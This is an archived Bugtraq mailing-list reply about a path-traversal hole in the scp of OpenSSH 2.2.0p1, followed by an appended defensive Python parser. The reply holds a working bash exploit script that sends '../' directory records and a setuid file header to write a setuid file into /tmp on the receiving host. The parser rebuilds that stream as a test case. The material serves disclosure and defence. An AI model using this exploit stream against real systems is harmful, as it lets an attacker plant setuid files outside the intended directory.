Bugtraq mailing list archives

Re: openssh2.2.p1 - Re: scp file transfer hole


From: Robert Bihlmeyer <robbe () ORCUS PRIV AT>
Date: Mon, 2 Oct 2000 19:06:01 +0200

Martin MaD Douda <martin () DOUDA NET> writes:

> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".

It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:

--
#!/bin/bash

echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--


> Since openssh 2.2.0p1 is the latest existing version, this vulnerability
> probably exists in every single scp version in the world.

Data Fellows/SSH Communication Security's ssh 2 uses a different file
transfer protocol. So the above exploit won't work. That doesn't mean
that there are more sanity checks, though.

--
Robbe
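As an added illustration (my own Python, not code from this thread and not OpenSSH's scp), here is a sink-side parser for the same source-to-sink stream the script above emits, with the sanity checks a sink needs before acting on a record: an entry name must be a single path component (no "/", not "." or ".."), and the setuid/setgid/sticky bits in a "C4755" header are masked off. The wire format assumed is the classic rcp/scp one as the script uses it (header line, file body, one-byte status); the 200 random bytes are replaced by a constant filler, and all sample streams are constructed here.

```python
import re

# Header of a C (file) or D (directory) record in the classic rcp/scp
# stream: type letter, four octal mode digits, decimal size, entry name.
HEADER_RE = re.compile(rb"^([CD])([0-7]{4}) (\d+) (.+)$")

# Only plain permission bits survive; setuid/setgid/sticky are dropped, so
# the "C4755" from the script above lands as 0755.
SAFE_MODE_MASK = 0o0777


class ScpProtocolError(Exception):
    """Raised when a record is malformed or names something outside the target."""


def check_name(name: bytes) -> str:
    """Accept only a single path component that cannot leave the target dir."""
    if not name or b"\0" in name:
        raise ScpProtocolError("empty or NUL-containing name")
    if b"/" in name or name in (b".", b".."):
        raise ScpProtocolError("unsafe name %r" % name)
    return name.decode("utf-8", "replace")


def parse_stream(data: bytes) -> list:
    """Walk a source-to-sink stream and return the actions a sink would take.

    Each action is ("mkdir", path, mode), ("file", path, mode, size) or
    ("leave", None, None). Paths are relative to the target directory and
    follow the D/E nesting, mirroring the sink's chdir chain.
    """
    actions = []
    depth = []  # names of directories currently entered
    pos = 0
    while pos < len(data):
        if data[pos] == 0:
            # Stray status byte (the post's stream ends with two NULs).
            pos += 1
            continue
        nl = data.find(b"\n", pos)
        if nl == -1:
            raise ScpProtocolError("truncated header")
        header = data[pos:nl]
        pos = nl + 1
        if header == b"E":
            if not depth:
                raise ScpProtocolError("E without matching D")
            depth.pop()
            actions.append(("leave", None, None))
            continue
        if header.startswith(b"T"):
            continue  # modification/access time record, ignored here
        m = HEADER_RE.match(header)
        if m is None:
            raise ScpProtocolError("malformed header %r" % header)
        kind, mode, size, name = m.groups()
        mode = int(mode, 8) & SAFE_MODE_MASK
        size = int(size)
        safe = check_name(name)  # rejects the "../../tmp" names used above
        path = "/".join(depth + [safe])
        if kind == b"D":
            depth.append(safe)
            actions.append(("mkdir", path, mode))
            continue
        body = data[pos:pos + size]
        if len(body) != size:
            raise ScpProtocolError("truncated file body for %s" % path)
        pos += size
        if pos >= len(data) or data[pos] != 0:
            raise ScpProtocolError("missing or non-zero status after %s" % path)
        pos += 1
        actions.append(("file", path, mode, size))
    return actions


def audit(data: bytes):
    """Return ("ok", actions) or ("rejected", reason) for a whole stream."""
    try:
        return ("ok", parse_stream(data))
    except ScpProtocolError as exc:
        return ("rejected", str(exc))


# Constructed: what the script in the post writes, with "x" * 200 standing
# in for the 200 bytes read from /dev/urandom.
POST_STREAM = (
    b"D0755 0 ../../../../../../tmp/nope\n"
    b"D0755 0 ../../../../../../tmp\n"
    b"C4755 200 ScpIsBuggy\n" + b"x" * 200 + b"\0\0"
)

# Constructed: a well-formed transfer, including a setuid mode to be masked.
BENIGN_STREAM = (
    b"D0755 0 docs\n"
    b"C0644 5 readme\nhello\0"
    b"E\n"
    b"C4755 3 tool\nabc\0"
)

if __name__ == "__main__":
    print(audit(BENIGN_STREAM))
    print(audit(POST_STREAM))
```

Running it shows the benign stream turning into four actions with "tool" created as 0755, while the post's stream is rejected at its first header because the directory name contains "/"; a lone "D0755 0 ..\n" record is rejected for the same reason.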

